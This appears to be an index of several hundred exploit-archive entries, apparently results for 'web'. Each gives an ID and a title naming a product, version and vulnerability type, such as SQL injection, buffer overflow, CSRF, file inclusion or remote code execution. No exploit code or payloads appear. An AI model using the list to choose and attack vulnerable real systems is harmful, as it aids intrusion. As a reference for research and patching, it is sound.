[18687] Landshop 0.9.2 - Multiple Web Vulnerabilities
[18665] PHP 5.4.0 Built-in Web Server DoS PoC
[18634] Dell Webcam CrazyTalk ActiveX BackImage Vulnerability
[18621] Dell Webcam Software Bundled ActiveX Remote Buffer Overflow Vulnerability
[18575] RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)
[18571] promise webpam 2.2.0.13 - Multiple Vulnerabilities
[18556] Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities
[18536] WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)
[18523] webgrind 1.0 (file param) Local File Inclusion Vulnerability
[18520] Sun Java Web Start Plugin Command Line Argument Injection (2012)
[18512] Unity 3D Web Player <= 3.2.0.61061 Denial of Service
[18510] webcamxp and webcam 7 - Directory Traversal vulnerability
[18456] Achievo 1.4.3 - Multiple Web Vulnerabilities
[18451] Sphinix Mobile Web Server 3.1.2.47 Multiple Persistent XSS Vulnerabilities
[18447] MailEnable Webmail Cross-Site Scripting Vulnerability
[18446] Webkit Normalize Bug - Android 2.2
[18416] stoneware webnetwork6 - Multiple Vulnerabilities
[18407] AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload
[18401] Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)
[18367] XAMPP WebDAV PHP Upload
[18335] MangosWeb SQL Injection Vulnerability
[18322] TinyWebGallery 1.8.3 - Remote Command Execution
[18293] Akiva WebBoard 8.x SQL Injection Vulnerability
[18260] Barracuda Control Center 620 - Multiple Web Vulnerabilities
[18249] appRain CMF 0.1.5 - Multiple Web Vulnerabilities
[18247] Capexweb 1.1 - SQL Injection Vulnerability
[18240] CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow
[18202] Meditate Web Content Editor 'username_input' SQL-Injection vulnerability
[18121] FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution
[18117] Authenex A-Key/ASAS Web Management Control 3.1.0.2 (latest) - Time-based SQL Injection
[18070] Web File Browser 0.4b14 File Download Vulnerability
[18051] BroadWin WebAccess SCADA/HMI Client Remote Code Execution
[18012] Metasploit 4.1.0 Web UI stored XSS Vulnerability
[17993] Apple Safari Webkit libxslt Arbitrary File Creation
[17963] atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities
[17933] DivX Plus Web Player "file://" Buffer Overflow Vulnerability PoC
[17867] Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion
[17861] Wordpress AllWebMenus Plugin 1.1.3 - Remote File Inclusion
[17813] Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities
[17786] Webmobo WB News System Blind SQL Injection
[17785] TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)
[17772] BroadWin WebAccess Client Multiple Vulnerabilities
[17708] Web Solutions Wcs2u SQL Injection Vulnerability
[17635] HP JetDirect PJL Interface Universal Path Traversal
[17581] MyWebServer 1.0.3 - Arbitrary File Download
[17580] MyWebServer 1.0.3 - Denial of Service
[17578] MinaliC Webserver 2.0 - Remote Source Disclosure
[17577] SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC
[17533] Inscribe Webmedia SQL Injection Vulnerability
[17500] LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability
[17487] WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
[17444] Webcat Multiple Blind SQL Injection Vulnerabilities
[17438] IBM Web Application Firewall Bypass
[17408] WeBid 1.0.2 persistent XSS via SQL Injection
[17404] IBM WebSphere Application Server 7.0.0.13 CSRF Vulnerability
[17396] Opera Web Browser 11.11 Remote Crash
[17381] simple web-server 1.2 - Directory Traversal
[17361] Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)
[17360] WebSVN 2.3.2 Improper Metacharacters Escaping exec() Remote Command Injection
[17359] Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit
[17269] ICONICS WebHMI ActiveX Buffer Overflow
[17240] ICONICS WebHMI ActiveX Stack Overflow
[17237] Horizon Web Builder (fshow.php) SQL Injection Vulnerability
[17204] DynMedia Pro Web CMS 4.0 - Local File Disclosure
[17203] Web2Project 2.3 - SQL Injection Vulnerability
[17198] 360 Web Manager 3.0 - Multiple Vulnerabilities
[17192] docuFORM Mercury WebApp 6.16a/5.20 Multiple XSS Vulnerabilities
[17180] Shape Web Solutions CMS SQL Injection Vulnerability
[17125] Dream Vision Technologies Web Portal SQL Injection Vulnerability
[17094] Allomani Web Links 1.0 - CSRF Vulnerability (Add Admin)
[17063] easy file sharing web server 5.8 - Multiple Vulnerabilities
[17057] webEdition CMS Local File Inclusion Vulnerability
[17055] Honey Soft Web Solution Multiple Vulnerabilities
[17054] webedition cms 6.1.0.2 - Multiple Vulnerabilities
[17053] wodWebServer.NET 1.3.3 - Directory Traversal
[17044] HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
[17043] HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
[17041] HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
[17036] Web Wiz Forum Injection Vulnerability
[17030] HP NNM CGI webappmon.exe execvp Buffer Overflow
[17029] HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
[16996] Fake Webcam 6.1 - Local Crash PoC
[16993] ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution
[16974] Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit
[16959] Oracle WebLogic Session Fixation Via HTTP POST
[16953] Luch Web Designer Multiple SQL Injection Vulnerabilities
[16949] maian weblog <= 4.0 - Remote Blind SQL Injection
[16939] Hiawatha WebServer 7.4 - Denial of Service Vulnerability
[16935] bacula-web 1.3.x - 5.0.3 - Multiple Vulnerabilities
[16923] ContentKeeper Web Remote Command Execution
[16910] Mitel Audio and Web Conferencing Command Injection
[16872] WebSTAR FTP Server USER Overflow
[16804] Belkin Bulldog Plus Web Service Buffer Overflow
[16802] Webster HTTP Server GET Buffer Overflow
[16796] BEA Weblogic Transfer-Encoding Buffer Overflow
[16793] Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
[16792] HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
[16791] MaxDB WebDBM GET Buffer Overflow
[16776] Alt-N WebAdmin USER Buffer Overflow
[16770] Savant 3.1 Web Server Overflow
[16767] IA WebMail 3.x Buffer Overflow
[16765] MaxDB WebDBM Database Parameter Overflow
[16762] BEA WebLogic JSESSIONID Cookie Value Overflow
[16758] SAP DB 7.4 WebTools Buffer Overflow
[16753] Xitami 2.5c2 Web Server If-Modified-Since Overflow
[16749] Microsoft RPC DCOM Interface Overflow
[16697] IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
[16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
[16641] SasCam Webcam Server 2.6.5 Get() method - Buffer Overflow
[16635] activePDF WebGrabber ActiveX Control Buffer Overflow
[16604] WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
[16585] Sun Java Web Start Plugin Command Line Argument Injection
[16575] SAP AG SAPgui EAI WebViewer3D Buffer Overflow
[16564] Internet Explorer WebViewFolderIcon setSlice() Overflow
[16550] WebDAV - Application DLL Hijacker
[16502] IBM Lotus Domino Web Access Upload Module Buffer Overflow
[16495] Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
[16491] WinVNC Web Server <= 3.3.3r7 - GET Overflow
[16471] Microsoft IIS WebDAV Write Access Code Execution
[16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
[16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
[16314] Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
[16301] Firefox location.QueryInterface() Code Execution
[16205] DIY Web CMS Multiple Vulnerabilities
[16140] Web 2.0 Social Network Freunde Community SQL Injection Vulnerability
[16090] TinyWebGallery 1.8.3 - Multiple Vulnerabilities
[16044] ab web cms 1.35 - Multiple Vulnerabilities
[16042] Opera Web Browser 11.00 - Integer Overflow Vulnerability
[15869] CA ARCserve D2D r15 Web Service Servlet Code Execution
[15868] QuickPHP Web Server Arbitrary (src .php) File Download
[15862] quickphp web server 1.9.1 - Directory Traversal
[15837] Web@all <= 1.1 - Remote Admin Settings Change
[15821] HttpBlitz Web Server Denial of Service Exploit
[15790] PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection
[15781] Inout Webmail Script Persistent XSS Vulnerability
[15744] Gitweb <= 1.7.3.3 - Cross Site Scripting
[15723] FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit
[15688] HotWebScripts HotWeb Rentals (resorts.asp) SQL injection
[15631] HP LaserJet Directory Traversal in PJL Interface
[15629] MicroNetSoft RV Dealer Website search.asp, showAlllistings.asp SQL Injection
[15617] VMware 2 Web Server - Directory Traversal
[15567] WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion Vulnerability
[15553] BPConferenceReporting Web Reporting Authentication Bypass Vulnerability
[15548] Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
[15544] Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability
[15517] Webmatic (index.php) SQL Injection Vulnerability
[15482] Qtweb Browser 3.5 - Buffer Overflow Vulnerability
[15387] Webmedia Explorer 6.13.1 Stored Cross Site Scripting Vulnerability
[15373] mongoose web server 2.11 - Directory Traversal vulnerability
[15336] MinaliC Webserver 1.0 - Remote Source Disclosure/File Download
[15334] MinaliC Webserver 1.0 - Denial of Service Vulnerability
[15333] MinaliC Webserver 1.0 - Directory Traversal Vulnerability
[15290] Oracle Sun Java System Web Server - HTTP Response Splitting
[15268] WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability
[15239] WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability
[15219] xWeblog 2.2 - (arsiv.asp tarih) SQL Injection Exploit
[15218] xWeblog 2.2 - (oku.asp?makale_id) SQL Injection Vulnerability
[15207] Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion Vulnerability
[15153] Webspell 4.x - safe_query Bypass Vulnerability
[15152] Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability
[15151] Webspell 4.2.1 asearch.php SQL Injection Vulnerability
[15098] FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
[15046] Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability
[14976] YOPS Web Server Remote Command Execution
[14967] Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption
[14943] moaub #8 - sirang web-based d-control Multiple Vulnerabilities
[14925] weborf <= 0.12.2 - Directory Traversal vulnerability
[14919] Micronetsoft Rental Property Management Website SQL Injection Vulnerability
[14916] MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution
[14914] Micronetsoft RV Dealer Website SQL Injection Vulnerability
[14848] Web-Ideas Web Shop Standard SQL Injection Vulnerability
[14617] Apache JackRabbit 2.0.0 webapp XPath Injection
[14528] APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability
[14447] Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)
[14427] Outlook Web Access 2003 CSRF Vulnerability
[14375] Pre Dynamic Institution Web Authentication Bypass
[14374] Pre Web Host System Authentication Bypass
[14367] Novell Groupwise Webaccess Stack Overflow
[14316] PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit
[14287] Sun Java Web Server 7.0 u7 - Exploit with DEP bypass
[14285] Outlook Web Access 2007 CSRF Vulnerability
[14256] HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
[14254] EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)
[14237] IBM Bladecenter Management - Multiple web application vulnerabilities
[14225] Bs Realtor_Web Script SQL Injection Vulnerability
[14224] Bs Recipes_Website Script SQL Injection/Auth Bypass Vulnerability
[14217] WikiWebHelp 0.28 - SQL Injection Vulnerability
[14195] SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite
[14194] Sun Java Web Server 7.0 u7 Remote Exploit
[14160] InterScan Web Security 5.0 Permanent XSS
[14144] Specialist Bed and Breakfast Website SQL Injection Vulnerability
[14132] webERP 3.11.4 - Multiple Vulnerabilities
[14123] WebDM CMS SQL Injection Vulnerability
[14020] 2DayBiz - The Web Template Software SQL injection and XSS vulnerability
[14012] Weborf HTTP Server Denial of Service Vulnerability
[14006] InterScan Web Security 5.0 - Local Privilege Escalation
[14004] InterScan Web Security 5.0 - Arbitrary File Upload
[14001] InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download
[13975] Webring Script SQL Injection Vulnerability
[13955] Joomla Template BizWeb com_community Persistent XSS Vulnerability
[13938] WebsiteBaker 2.8.1 CSRF Proof of Concept
[13920] H264WebCam Boundary Condition Error
[13866] Joke Website Script SQL Injection and Cross-Site Scripting Vulnerabilities
[13850] Litespeed Technologies Web Server Remote Poison null byte Exploit
[13842] VU Web Visitor Analyst Authentication Bypass
[13816] Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection
[13788] Web Wiz Forums 9.68 SQLi Vulnerability
[13779] Pre Web Host - SQL Injection Vulnerability
[13750] WebBiblio Subject Gateway System LFI Vulnerability
[13735] OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
[12867] clickartweb Design SQL Injection Vulnerability
[12861] PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability
[12852] QtWeb 3.3 - Remote DoS/Crash Exploit
[12815] GoAhead Webserver Source Code Disclosure Vulnerability
[12798] Webiz - SQL Injection Vulnerability
[12797] Webiz - Local Shell Upload Vulnerability
[12791] Aim Web Design Multiple Vulnerabilities
[12788] Marketing Web Design Multiple Vulnerabilities
[12776] Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability
[12772] Realtor WebSite System E-Commerce SQL Injection Vulnerability
[12761] GlobalWebTek Design SQL Injection Vulnerability
[12754] Easy Address book Webserver 1.2 CSRF
[12750] RapidWareX 2.0.1 - (WebUI) CSRF Exploit
[12744] Webit Cms SQL Injection Vulnerability
[12743] web5000 (page_show) SQL Injection Vulnerability
[12740] POC - SEH control (0day) of Webby webserver
[12736] Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability
[12735] NITRO Web Gallery SQL Injection Vulnerability
[12731] Webloader 8 - SQL Injection Vulnerability
[12730] ProWeb Design SQL Injection Vulnerability
[12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability
[12724] WebAsys blindSQL-inj exploit
[12722] interuse Website Builder & design (index2.php) SQL Injection Vulnerability
[12717] Telia Web Design (index.php) SQL Injection Vulnerability
[12710] Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) - Kernel Mode Local Priv. Escalation
[12709] webperformance Ecommerce SQL Vulnerability
[12703] Recipes Website 1.0 - SQL Injection
[12699] eWebEditor 1.x - (WYSIWYG) Remote File Upload
[12674] webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability
[12658] Web Administration Broken Access Control in McAfee Email Gateway
[12655] QtWeb Browser 3.3 - DoS
[12647] Webloader 7 - 8 (vid) SQL Injection Vulnerability
[12644] WebJaxe SQL Injection
[12640] Abyss Web Server X1 - CSRF
[12631] Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
[12583] e-webtech (fixed_page.asp) SQL Injection Vulnerability
[12582] zervit Web Server 0.4 - Directory Traversals
[12581] zervit Web Server 0.4 - Source Disclosure/Download
[12580] miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits
[12571] e-webtech (page.asp) SQL Injection Vulnerability
[12547] e-webtech (new.asp?id=) SQL Injection Vulnerability
[12526] ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability
[12522] WeBProdZ CMS SQL Injection Vulnerability
[12515] Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability
[12467] Webthaiapp detail.php(cat) Blind SQL Injection Vulnerability
[12431] Webmoney Advisor ActiveX Remote DoS Exploit
[12425] Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS
[12401] WebKit <= 532.5 Stack Exhaustion
[12387] webessence 1.0.2 - Multiple Vulnerabilities
[12369] Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
[12359] Memorial Web Site Script Multiple Arbitrary Delete Vuln
[12358] Memorial Web Site Script - Reset Password & Insecure Cookie Handling
[12354] NKINFOWEB SQL Injection Exploit
[12351] memorial web site script - (id) SQL Injection Vulnerability
[12323] wb news (webmobo) 2.3.3 - Stored XSS
[12309] Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits
[12295] N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
[12267] WebAdmin Shell Upload Vulnerability
[12244] iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit
[12166] Joomla Component Web TV com_webtv Local File Inclusion Vulnerability
[12122] JAVA Web Start Arbitrary command-line injection
[12114] miniature java web server <= 1.71 - Multiple Vulnerabilities
[12111] Joomla Component Webee Comments Local File Inclusion Vulnerability
[12095] Virata EmWeb R6.0.1 - Remote Crash Vulnerability
[12033] Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting
[12010] uTorrent WebUI <= 0.370 - Authorization header DoS Exploit
[11999] Joomla Component webERPcustomer Local File Inclusion
[11989] Faweb_2 Multi Vulnerability
[11974] HP OpenView NNM OvWebHelp.exe CGI Topic overflow
[11906] Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.
[11903] Open Web Analytics 1.2.3 multi file include
[11883] WebSiteBaker 2.8.1 DataBase Backup Disclosure
[11831] WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability
[11763] Embedthis Appweb 3.1.2 - Remote DoS
[11689] Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection Vulnerability
[11666] Uebimiau Webmail 3.2.0-2.0 - Email Disclosure
[11661] SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit
[11579] WebAdministrator Lite CMS SQL Injection Vulnerability
[11574] iPhone WebCore::CSSSelector() Remote Crash Vulnerability
[11569] Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities
[11503] Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities
[11497] gitWeb 1.5.2 - Remote Command Execution
[11485] Multiple File Attachments Mail Form Pro 2.0 - WebShell upload
[11430] southburn Web (products.php) SQL Injection Vulnerability
[11427] Multiple Web Browser Vulnerabilities in Nokia Symbian OS 3rd Edition
[11414] Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities
[11368] Yes Solutions - Webapp SQL Injection
[11316] GCP 2.0 datasets provided as BioCASE web services
[11299] crownweb (page.cfm) SQL Injection Vulnerability
[11295] eWebeditor ASP Version - Multiple Vulnerabilities
[11264] South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation
[11233] QtWeb 3.0 - Remote DoS/Crash Exploit
[11212] eWebeditor Directory Traversal
[11173] TrendMicro Web-Deployment ActiveX Remote Exec 0day PoC
[11036] RoundCube Webmail Multiple Vulnerabilities
[10955] MasterWeb Script <= 1.0 - (details&newsID) SQL Injection Vulnerability
[10942] Joomla Component com_cartweberp LFI Vulnerability
[10871] Freewebscript'z Games (Auth Bypass) SQL Injection Vulnerability
[10838] list Web (addlink.php id) Remote SQL Injection Vulnerability
[10794] WEB Calendar Remote Database Disclosure Vulnerability
[10733] com_webcamxp Cross Site Scripting Vulnerabilities
[10717] DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability
[10713] Esinti Web Design Gold Defter Database Disclosure Vulnerability
[10675] Webring - Cross Site Scripting Vulnerability
[10665] Jevonweb Guestbook Remote Admin Access Exploit
[10638] Web Wiz Forums 9.64 - Database Disclosure Vulnerability
[10637] Web Wiz NewsPad Database Disclosure Vulnerability
[10585] webCocoon's simpleCMS SQL Injection Vulnerability
[10583] social web cms <= beta 2 - Multiple Vulnerabilities
[10555] Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability
[10529] eWebquiz 8 - Blind SQL Injection Vulnerability
[10516] Jobscript4Web 3.5 - Multiple CSRF Vulnerability
[10434] Savant Web Server 3.1 - Remote Buffer Overflow Exploit
[10398] ZeeCareers 2.x - PHP HR Manager Website [ XSS / Auth Bypass ]
[10395] Miniweb 2.0 Full Path Disclosure
[10349] CoreHTTP web server off-by-one buffer overflow vulnerability
[10331] iWeb HTTP Server Directory Traversal Vulnerability
[10225] MDaemon WebAdmin 2.0.x - SQL injection
[10216] kr-web <= 1.1b2 - Remote File Inclusion Vulnerability
[10171] Baby Web Server 2.7.2 Vulnerability found Denial of Service (0day)
[10094] IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting
[10087] WebKit XML External Entity Information Disclosure Vulnerability
[10086] WebKit 'Document()' Function Remote Information Disclosure Vulnerability
[10081] Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability
[9981] Websense Email Security xss
[9980] Websense Email Security DoS
[9970] South River Technologies WebDrive Service privilege escalation
[9966] Serv-u web client 9.0.0.5 buffer overflow
[9956] Palm Pre WebOS 1.1 DoS
[9928] WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)
[9916] ContentKeeper Web Appliance < 125.10 Command Execution
[9897] Mongoose Web Server 2.8.0 Source Disclosure
[9877] DWebPro command injection
[9874] Cherokee web server 0.5.4 DoS
[9857] AfterLogic WebMail Pro 4.7.10 xss
[9850] Xerox Fiery Webtools SQL Injection
[9829] nginx 0.7.61 WebDAV directory traversal
[9813] Mereo Web Server 1.8 - Remote Source Code Disclosure
[9800] Serv-u web client 9.0.0.5 buffer overflow
[9694] NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability
[9676] BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability
[9675] HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
[9657] httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit
[9650] Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2
[9644] Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit
[9643] kolibri+ webserver 2 - Directory Traversal vulnerability
[9638] Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability
[9621] Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability
[9500] NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit
[9493] Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln
[9454] Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC
[9429] EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC
[9411] Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC
[9344] Multi Website 1.5 (index php action) SQL Injection Vulnerability
[9339] Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Vulnerabilities
[9338] Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities
[9337] simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability
[9335] TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability
[9304] Epiri Professional Web Browser 3.0 - Remote Crash Exploit
[9284] SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities
[9224] MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit
[9193] WebVision 2.1 (news.php n) Remote SQL Injection Exploit
[9165] webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit
[9164] webLeague 2.2.0 (install.php) Remote Change Password Exploit
[9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC
[9162] WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability
[9160] Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)
[9116] AwingSoft Web3D Player (WindsPly.ocx) Remote BOF PoC
[9106] citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities
[9096] Sun One WebServer 6.1 JSP Source Viewing Vulnerability
[9092] webasyst shop-script (bsql/xss) Multiple Vulnerabilities
[8980] FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit
[8979] FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities
[8954] adaptweb 0.9.2 (lfi/sql) Multiple Vulnerabilities
[8944] Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities
[8939] phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit
[8928] phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln
[8878] Web Directory PRO Remote Database Backup Vulnerability
[8876] Web Directory PRO (admins.php) Change Admin Password Exploit
[8859] WebEyes Guest Book 3 - (yorum.asp mesajid) SQL Injection Vulnerability
[8857] WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability
[8846] ASMAX AR 804 gu Web Management Console Arbitrary Command Exec
[8833] Linksys WAG54G2 Web Management Console Arbitrary Command Exec
[8823] Webboard <= 2.90 beta - Remote File Disclosure Vulnerability
[8810] WebMember 1.0 (formID) Remote SQL Injection Vulnerability
[8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
[8792] Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities
[8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)
[8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
[8748] Realty Web-Base 1.0 (list_list.php id) SQL Injection Vulnerability
[8742] KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability
[8721] Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC
[8717] ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit
[8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability
[8666] zervit webserver 0.4 - Directory Traversal / memory corruption PoC
[8649] TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
[8648] RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection Exploit
[8643] Realty Web-Base 1.0 (Auth Bypass) SQL Injection Vulnerability
[8622] webSPELL <= 4.2.0e (page) Remote Blind SQL Injection Exploit
[8564] Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit
[8561] Quick 'n Easy Web Server 3.3.5 Arbitrary File Disclosure Exploit
[8559] webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)
[8537] dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities
[8524] Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
[8516] WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities
[8511] Xitami Web Server <= 5.0 - Remote Denial of Service Exploit
[8500] Zervit Webserver 0.3 - Remote Denial of Service Exploit
[8487] EZ Webitor (Auth Bypass) SQL Injection Vulnerability
[8486] webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln
[8463] Zervit Webserver 0.02 Remote Directory Traversal Vulnerability
[8453] webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability
[8447] Zervit Webserver 0.02 Remote Buffer Overflow PoC
[8446] FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability
[8428] MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)
[8409] Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
[8392] Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability
[8391] Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC
[8382] WebFileExplorer 3.1 (Auth Bypass) SQL Injection Vulnerability
[8374] WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability
[8368] peterConnects Web Server Traversal Arbitrary File Access Vulnerability
[8336] Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit
[8333] Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulns
[8328] webEdition <= 6.0.0.4 (WE_LANGUAGE) Local File Inclusion Vulnerability
[8313] Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
[8288] WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability
[8213] VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit
[8209] Kim Websites 1.0 (Auth Bypass) SQL Injection Vulnerability
[8195] WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
[8188] CMS WEBjump! Multiple SQL Injection Vulnerabilities
[8156] Easy Web Password 1.2 - Local Heap Memory Consumption PoC
[8155] Easy File Sharing Web Server 4.8 File Disclosure Vulnerability
[8111] SkyPortal WebLinks 0.12 Contents Change Vulnerability
[8025] webframe 0.76 Multiple File Inclusion Vulnerabilities
[8017] SnippetMaster Webpage Editor 2,2,2 (RFI/XSS) Multiple Vulnerabilities
[7989] Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista)
[7988] Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)
[7966] navicopa webserver 3.0.1 (bof/sd) Multiple Vulnerabilities
[7961] WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit
[7926] Amaya Web Editor 11 Remote SEH Overwrite Exploit
[7919] Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities
[7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution
[7906] Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC
[7902] Amaya Web Editor XML and HTML parser Vulnerabilities
[7861] Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability
[7790] netsurf web browser 1.2 - Multiple Vulnerabilities
[7657] webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability
